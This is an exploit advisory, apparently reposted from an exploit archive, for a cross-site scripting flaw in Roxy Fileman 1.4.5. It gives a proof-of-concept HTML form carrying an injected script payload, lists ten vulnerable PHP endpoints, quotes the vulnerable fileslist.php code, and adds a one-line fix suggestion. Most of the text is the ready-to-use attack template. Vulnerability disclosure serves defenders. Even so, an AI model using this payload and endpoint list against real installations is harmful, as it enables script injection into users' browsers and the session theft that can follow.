Home / os / blackberry
Roxy Fileman Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>Roxy Fileman Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>*=============================================================| | Exploit Title: Roxy Fileman Cross Site Scripting | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://www.roxyfileman.com/ | | Download Link : http://www.roxyfileman.com/download.php?f=1.4.5-php | | Version : V 1.4.5 | | Platform : PHP | | Tested on: Kali Linux | | Date: 1 /12 / 2017 *=============================================================| | Exploit Code: | |<HTML> |<HEAD> | <TITLE>Roxy Fileman Cross Site Scripting</TITLE> |</HEAD> |<BODY> |<form action="http://Target/[PATH]/fileman/php/fileslist.php" method="post"> | <input type="hidden" id="d" value="=%252F2%252Ffileman%252FUploads'%22()%26%25"><script>alert('M.R.S.L.Y')</script>/> |</form> |</BODY> |</HTML> | *=======================| | vulnerability Method : GET & POST | Files that have this vulnerability : | | http://Target/[PATH]/fileman/php/copydir.php | http://Target/[PATH]/fileman/php/copyfile.php | http://Target/[PATH]/fileman/php/createdir.php | http://Target/[PATH]/fileman/php/deletedir.php | http://Target/[PATH]/fileman/php/renamedir.php | http://Target/[PATH]/fileman/php/thumb.php | http://Target/[PATH]/fileman/php/movefile.php | http://Target/[PATH]/fileman/php/downloaddir.php | http://Target/[PATH]/fileman/php/dirtree.php | http://Target/[PATH]/fileman/php/movedir.php *=======================| |How to fix this vulnerability : | |You should first try to f.ilter all input variables ، After use command echo in script :) | *=======================| |Vulnerable code For Example: | |include '../system.inc.php'; |include 'functions.inc.php'; | |verifyAction('FILESLIST'); |checkAccess('FILESLIST'); | |$path = (empty($_POST['d'])? getFilesPath(): $_POST['d']); |$type = (empty($_POST['type'])?'':strtolower($_POST['type'])); |if($type != 'image' && $type != 'flash') | $type = ''; |verifyPath($path); | |$files = listDirectory(fixPath($path), 0); |natcasesort($files); |$str = ''; |echo '['; |foreach ($files as $f){ | $fullPath = $path.'/'.$f; | if(!is_file(fixPath($fullPath)) || ($type == 'image' && !RoxyFile::IsImage($f)) || ($type == 'flash' && !RoxyFile::IsFlash($f))) | continue; | $size = filesize(fixPath($fullPath)); | $time = filemtime(fixPath($fullPath)); | $w = 0; | $h = 0; | if(RoxyFile::IsImage($f)){ | $tmp = @getimagesize(fixPath($fullPath)); | if($tmp){ | $w = $tmp[0]; | $h = $tmp[1]; | } | } | $str .= '{"p":"'.mb_ereg_replace('"', '"', $fullPath).'","s":"'.$size.'","t":"'.$time.'","w":"'.$w.'","h":"'.$h.'"},'; |} |$str = mb_substr($str, 0, -1); |echo $str; |echo ']'; |?> *=============================================================| | Special Thanks To : Ehsan Cod3r ، micle ، Und3rgr0und ، Amir.ght ، | xenotix، modiret، V For Vendetta ، Alireza ، r4ouf ، Spoofer ، | And All Of My Friends ، The Last One : My Self, M.R.S.L.Y *=============================================================| </BODY></HTML>